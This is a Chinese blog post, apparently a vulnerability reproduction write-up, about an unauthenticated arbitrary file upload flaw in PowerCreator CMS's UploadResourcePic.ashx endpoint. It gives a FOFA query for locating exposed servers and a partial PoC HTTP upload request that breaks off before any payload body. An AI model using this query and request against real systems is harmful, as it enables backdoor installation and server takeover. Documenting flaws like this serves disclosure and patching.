首页 > 其他分享 >PowerCreatorCMS UploadResourcePic 任意文件上传漏洞复现

PowerCreatorCMS UploadResourcePic 任意文件上传漏洞复现

时间:2024-07-12 11:27:04浏览次数:16  
标签:PowerCreatorCMS 翰博尔 UploadResourcePic 漏洞 复现 CMS PowerCreator

0x01 产品简介

PowerCreator CMS是翰博尔信息技术有限公司(简称翰博尔PowerCreator)推出的一款教育资源管理平台,专注于教育领域的信息化解决方案。PowerCreator CMS是集成了软件平台和硬件设备、多系统高度融合的教育资源管理平台。它旨在通过技术手段提升教育资源的管理、共享和应用效率,助力教育机构实现教学管理的现代化和智能化。

0x02 漏洞概述

PowerCreatorCMS UploadResourcePic 接口存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:app="PowerCreator-CMS"

0x04 漏洞复现

PoC

POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------2087390019235727803854

标签:PowerCreatorCMS,翰博尔,UploadResourcePic,漏洞,复现,CMS,PowerCreator
From: https://blog.csdn.net/qq_41904294/article/details/140372781

相关文章